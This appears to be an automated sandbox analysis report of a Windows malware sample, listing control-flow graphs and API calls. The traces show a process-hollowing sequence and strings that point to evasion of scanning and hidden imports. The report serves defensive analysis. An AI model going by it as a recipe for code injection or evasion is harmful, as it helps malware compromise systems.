                                                                                                                                              control_flow_graph 6798 2848bb0-2848bb3 6799 2848bb8-2848bbd 6798->6799 6799->6799 6800 2848bbf-2848ca6 call 283493c call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 6799->6800 6831 284a6f7-284a761 call 28344d0 * 2 call 2834c0c call 28344d0 call 28344ac call 28344d0 * 2 6800->6831 6832 2848cac-2848d87 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 6800->6832 6832->6831 6875 2848d8d-28490b5 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 28330d4 * 2 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 2834d8c call 2834d9c call 28485dc 6832->6875 6984 28490b7-2849123 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 6875->6984 6985 2849128-2849449 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 28346a4 * 2 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 2832ee0 call 2832f08 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 GetThreadContext 6875->6985 6984->6985 6985->6831 7093 284944f-28496b2 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 2848254 6985->7093 7166 28499bf-2849a2a call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 7093->7166 7167 28496b8-2849821 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 28484c4 7093->7167 7192 2849a30-2849bb0 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 28479b4 7166->7192 7193 2849a2b call 2848824 7166->7193 7257 2849823-2849849 call 28479b4 7167->7257 7258 284984b-28498b6 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 7167->7258 7192->6831 7298 2849bb6-2849caf call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 2848ac0 7192->7298 7193->7192 7266 28498bc-28499b3 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 28479b4 7257->7266 7258->7266 7297 28498b7 call 2848824 7258->7297 7337 28499b8-28499bd 7266->7337 7297->7266 7349 2849cb1-2849cfe call 28489b8 call 28489ac 7298->7349 7350 2849d03-284a45b call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 2847d00 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 2847d00 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 SetThreadContext NtResumeThread call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 2832c2c call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 28487a0 * 3 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 7298->7350 7337->7192 7349->7350 7575 284a460-284a6f2 call 28487a0 * 2 call 283480c call 283494c call 2834798 call 283494c call 28487a0 call 283480c call 283494c call 2834798 call 283494c call 28487a0 * 5 call 283480c call 283494c call 2834798 call 283494c call 28487a0 call 283480c call 283494c call 2834798 call 283494c call 28487a0 call 283480c call 283494c call 2834798 call 283494c call 28487a0 call 283480c call 283494c call 2834798 call 283494c call 28487a0 call 2847ed4 call 28487a0 * 2 7350->7575 7575->6831
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 02848824: FreeLibrary.KERNEL32(02891384,00000000,02891388,Function_000055D8,00000004,02891398,02891388,05F5E0FF,00000040,0289139C,02891384,00000000,00000000,00000000,00000000,0284890B), ref: 028488EB
                                                                                                                                                • Part of subcall function 028485DC: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02848668
                                                                                                                                              • GetThreadContext.KERNEL32(028913D0,02891420,ScanString,028913A4,0284A77C,UacInitialize,028913A4,0284A77C,ScanBuffer,028913A4,0284A77C,ScanBuffer,028913A4,0284A77C,UacInitialize,028913A4), ref: 02849442
                                                                                                                                                • Part of subcall function 02848254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 028482C5
                                                                                                                                                • Part of subcall function 028484C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 02848529
                                                                                                                                                • Part of subcall function 028479B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02847A27
                                                                                                                                                • Part of subcall function 02847D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02847D74
                                                                                                                                              • SetThreadContext.KERNEL32(028913D0,02891420,ScanBuffer,028913A4,0284A77C,ScanString,028913A4,0284A77C,Initialize,028913A4,0284A77C,028913CC,028914BC,028914F8,00000004,028914FC), ref: 0284A157
                                                                                                                                              • NtResumeThread.NTDLL(028913D0,00000000), ref: 0284A164
                                                                                                                                                • Part of subcall function 028487A0: LoadLibraryW.KERNEL32(?,?), ref: 028487B4
                                                                                                                                                • Part of subcall function 028487A0: GetProcAddress.KERNEL32(02891390,BCryptVerifySignature), ref: 028487CE
                                                                                                                                                • Part of subcall function 028487A0: FreeLibrary.KERNEL32(02891390,02891390,BCryptVerifySignature,bcrypt,?,028913D0,00000000,028913A4,0284A3C7,ScanString,028913A4,0284A77C,ScanBuffer,028913A4,0284A77C,Initialize), ref: 0284880A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LibraryMemoryThreadVirtual$ContextFree$AddressAllocateCreateLoadProcProcessReadResumeSectionUnmapUserViewWrite
                                                                                                                                              • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                              • API String ID: 2388221946-51457883
                                                                                                                                              • Opcode ID: 205fe1893eca31b7d32816b4465447dd19ff8a241d0b1ae63bbdb5cc3286051b
                                                                                                                                              • Instruction ID: 8e7170226f045b3995d43ffce67947eedc9d119ea749bd4db5325024d5e5ae18
                                                                                                                                              • Opcode Fuzzy Hash: 205fe1893eca31b7d32816b4465447dd19ff8a241d0b1ae63bbdb5cc3286051b
                                                                                                                                              • Instruction Fuzzy Hash: 69E21E7CA5011C9BEB16EB68CC90EDE73BAEF49310F1040A1E549EB315DE74AE458F92

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 7653 2848bae-2848bb3 7655 2848bb8-2848bbd 7653->7655 7655->7655 7656 2848bbf-2848ca6 call 283493c call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 7655->7656 7687 284a6f7-284a761 call 28344d0 * 2 call 2834c0c call 28344d0 call 28344ac call 28344d0 * 2 7656->7687 7688 2848cac-2848d87 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 7656->7688 7688->7687 7731 2848d8d-28490b5 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 28330d4 * 2 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 2834d8c call 2834d9c call 28485dc 7688->7731 7840 28490b7-2849123 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 7731->7840 7841 2849128-2849449 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 28346a4 * 2 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 2832ee0 call 2832f08 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 GetThreadContext 7731->7841 7840->7841 7841->7687 7949 284944f-28496b2 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 2848254 7841->7949 8022 28499bf-2849a2a call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 7949->8022 8023 28496b8-2849821 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 28484c4 7949->8023 8048 2849a30-2849bb0 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 28479b4 8022->8048 8049 2849a2b call 2848824 8022->8049 8113 2849823-2849849 call 28479b4 8023->8113 8114 284984b-28498b6 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 8023->8114 8048->7687 8154 2849bb6-2849caf call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 2848ac0 8048->8154 8049->8048 8122 28498bc-28499bd call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 28479b4 8113->8122 8114->8122 8153 28498b7 call 2848824 8114->8153 8122->8048 8153->8122 8205 2849cb1-2849cfe call 28489b8 call 28489ac 8154->8205 8206 2849d03-284a6f2 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 2847d00 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 2847d00 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 SetThreadContext NtResumeThread call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 2832c2c call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 28487a0 * 3 call 283480c call 283494c call 28346a4 call 2834798 call 283494c call 28346a4 call 2848824 call 28487a0 * 2 call 283480c call 283494c call 2834798 call 283494c call 28487a0 call 283480c call 283494c call 2834798 call 283494c call 28487a0 * 5 call 283480c call 283494c call 2834798 call 283494c call 28487a0 call 283480c call 283494c call 2834798 call 283494c call 28487a0 call 283480c call 283494c call 2834798 call 283494c call 28487a0 call 283480c call 283494c call 2834798 call 283494c call 28487a0 call 2847ed4 call 28487a0 * 2 8154->8206 8205->8206 8206->7687
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 02848824: FreeLibrary.KERNEL32(02891384,00000000,02891388,Function_000055D8,00000004,02891398,02891388,05F5E0FF,00000040,0289139C,02891384,00000000,00000000,00000000,00000000,0284890B), ref: 028488EB
                                                                                                                                                • Part of subcall function 028485DC: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02848668
                                                                                                                                              • GetThreadContext.KERNEL32(028913D0,02891420,ScanString,028913A4,0284A77C,UacInitialize,028913A4,0284A77C,ScanBuffer,028913A4,0284A77C,ScanBuffer,028913A4,0284A77C,UacInitialize,028913A4), ref: 02849442
                                                                                                                                                • Part of subcall function 02848254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 028482C5
                                                                                                                                                • Part of subcall function 028484C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 02848529
                                                                                                                                                • Part of subcall function 028479B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02847A27
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MemoryVirtual$AllocateContextCreateFreeLibraryProcessReadSectionThreadUnmapUserView
                                                                                                                                              • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                              • API String ID: 3386062106-51457883
                                                                                                                                              • Opcode ID: 9d954e3c3b8be2db2bbb0cfd7cd766049b36ffefb6df12526a585d8b69b35fa3
                                                                                                                                              • Instruction ID: 030bc8779b19bf47991997729b795857eefe64e22657f984641f0f1129a4ce32
                                                                                                                                              • Opcode Fuzzy Hash: 9d954e3c3b8be2db2bbb0cfd7cd766049b36ffefb6df12526a585d8b69b35fa3
                                                                                                                                              • Instruction Fuzzy Hash: 67E21D7CA5011C9BEB16EB68CC90EDE73BAEF49310F1040A1E549EB315DE74AE458F92

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 8509 2835a78-2835ab9 GetModuleFileNameA RegOpenKeyExA 8510 2835afb-2835b3e call 28358b4 RegQueryValueExA 8509->8510 8511 2835abb-2835ad7 RegOpenKeyExA 8509->8511 8518 2835b62-2835b7c RegCloseKey 8510->8518 8519 2835b40-2835b5c RegQueryValueExA 8510->8519 8511->8510 8512 2835ad9-2835af5 RegOpenKeyExA 8511->8512 8512->8510 8514 2835b84-2835bb5 lstrcpyn GetThreadLocale GetLocaleInfoA 8512->8514 8516 2835bbb-2835bbf 8514->8516 8517 2835c9e-2835ca5 8514->8517 8520 2835bc1-2835bc5 8516->8520 8521 2835bcb-2835be1 lstrlen 8516->8521 8519->8518 8522 2835b5e 8519->8522 8520->8517 8520->8521 8523 2835be4-2835be7 8521->8523 8522->8518 8524 2835bf3-2835bfb 8523->8524 8525 2835be9-2835bf1 8523->8525 8524->8517 8527 2835c01-2835c06 8524->8527 8525->8524 8526 2835be3 8525->8526 8526->8523 8528 2835c30-2835c32 8527->8528 8529 2835c08-2835c2e lstrcpyn LoadLibraryExA 8527->8529 8528->8517 8530 2835c34-2835c38 8528->8530 8529->8528 8530->8517 8531 2835c3a-2835c6a lstrcpyn LoadLibraryExA 8530->8531 8531->8517 8532 2835c6c-2835c9c lstrcpyn LoadLibraryExA 8531->8532 8532->8517
                                                                                                                                              APIs
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 02835A94
                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02835AB2
                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02835AD0
                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02835AEE
                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02835B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02835B37
                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,02835CE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02835B7D,?,80000001), ref: 02835B55
                                                                                                                                              • RegCloseKey.ADVAPI32(?,02835B84,00000000,00000000,00000005,00000000,02835B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02835B77
                                                                                                                                              • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02835B94
                                                                                                                                              • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105), ref: 02835BA1
                                                                                                                                              • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105), ref: 02835BA7
                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 02835BD2
                                                                                                                                              • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02835C19
                                                                                                                                              • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02835C29
                                                                                                                                              • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02835C51
                                                                                                                                              • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02835C61
                                                                                                                                              • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02835C87
                                                                                                                                              • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02835C97
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                              • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                              • API String ID: 1759228003-3917250287
                                                                                                                                              • Opcode ID: 9f1ce140d8f699e697d70b86599326aba6c91981959300a1c886c2ed7f42b67d
                                                                                                                                              • Instruction ID: 7d31e59b48b37cb6463214799bd9763412aac47acce82f12393674953d37a350
                                                                                                                                              • Opcode Fuzzy Hash: 9f1ce140d8f699e697d70b86599326aba6c91981959300a1c886c2ed7f42b67d
                                                                                                                                              • Instruction Fuzzy Hash: 77519C7DA4024C7EFB22D6A8CC46FEF77BD9B08744F8005A1A608E6181D7789A44CFE5

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 02848020: GetModuleHandleA.KERNELBASE(?), ref: 02848072
                                                                                                                                                • Part of subcall function 028480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0284811B
                                                                                                                                                • Part of subcall function 028480C8: GetProcAddress.KERNEL32(?,?), ref: 0284812D
                                                                                                                                              • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02847A27
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressProc$AllocateHandleMemoryModuleVirtual
                                                                                                                                              • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                              • API String ID: 1888340430-445027087
                                                                                                                                              • Opcode ID: 42201f8186150d56e7a3448432414ee77fdc9381937ca28c009acf87a403715f
                                                                                                                                              • Instruction ID: fb243b65879693ef83ff771a887412645d86d1b1bc36d7f002a0ca54db077543
                                                                                                                                              • Opcode Fuzzy Hash: 42201f8186150d56e7a3448432414ee77fdc9381937ca28c009acf87a403715f
                                                                                                                                              • Instruction Fuzzy Hash: 23116D7D60420CAFEB01EFA8DC81E9EB7BDEB4C710F418861B904D7680DB74EA148B61

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 02848020: GetModuleHandleA.KERNELBASE(?), ref: 02848072
                                                                                                                                                • Part of subcall function 028480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0284811B
                                                                                                                                                • Part of subcall function 028480C8: GetProcAddress.KERNEL32(?,?), ref: 0284812D
                                                                                                                                              • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02847A27
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressProc$AllocateHandleMemoryModuleVirtual
                                                                                                                                              • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                              • API String ID: 1888340430-445027087
                                                                                                                                              • Opcode ID: 293d32187f7aba0ac61e92a8ab0c94d637e78dc88151e713830f8abb9929ff3f
                                                                                                                                              • Instruction ID: 2063cfff256473f9f9b525158f8cc6f140d88db41f1119106536f939daa0bace
                                                                                                                                              • Opcode Fuzzy Hash: 293d32187f7aba0ac61e92a8ab0c94d637e78dc88151e713830f8abb9929ff3f
                                                                                                                                              • Instruction Fuzzy Hash: 96116D7D60420CAFEB01EFA8DC81E9EB7BDEB4C710F418861B904D7680DB74AA148B61

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 02848020: GetModuleHandleA.KERNELBASE(?), ref: 02848072
                                                                                                                                                • Part of subcall function 028480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0284811B
                                                                                                                                                • Part of subcall function 028480C8: GetProcAddress.KERNEL32(?,?), ref: 0284812D
                                                                                                                                              • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 028482C5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressProc$HandleMemoryModuleReadVirtual
                                                                                                                                              • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                                                              • API String ID: 36784810-737317276
                                                                                                                                              • Opcode ID: 0800cda7d1901eba27241a1c261e252496bf0eb19fdc328cee7e5e837a041204
                                                                                                                                              • Instruction ID: f33f3053f4ed84bf60c18b0aa830cf207c349d261dc0f7fdaece8fc9390a74a2
                                                                                                                                              • Opcode Fuzzy Hash: 0800cda7d1901eba27241a1c261e252496bf0eb19fdc328cee7e5e837a041204
                                                                                                                                              • Instruction Fuzzy Hash: F9016D7D604208AFEB00EFA8DC41E5E77EEEB48700F454460F908D7640DA78A9109B65
                                                                                                                                              APIs
                                                                                                                                              • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 0284DB0B
                                                                                                                                              • NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0284DB72
                                                                                                                                              • NtClose.NTDLL(?), ref: 0284DB7B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Path$CloseFileNameName_Write
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1792072161-0
                                                                                                                                              • Opcode ID: 82860ca687eac46afe321229846b939be6fd8941a7c96ba0be63a213ae3b7e3f
                                                                                                                                              • Instruction ID: 51ee3cd47ac09682cd62ef804454aef7264397822d3a29f8580268f03788961c
                                                                                                                                              • Opcode Fuzzy Hash: 82860ca687eac46afe321229846b939be6fd8941a7c96ba0be63a213ae3b7e3f
                                                                                                                                              • Instruction Fuzzy Hash: AC21C179A4030CBBEB11EAE8CD46F9EB7BDEB04B14F504461B604F71D0DBB46E048A96
                                                                                                                                              APIs
                                                                                                                                              • RtlInitUnicodeString.NTDLL ref: 0284DA6C
                                                                                                                                              • RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 0284DA82
                                                                                                                                              • NtDeleteFile.NTDLL(?), ref: 0284DAA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.2192353833.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02831000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2831000_Oupzhkpr.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Path$DeleteFileInitNameName_StringUnicode
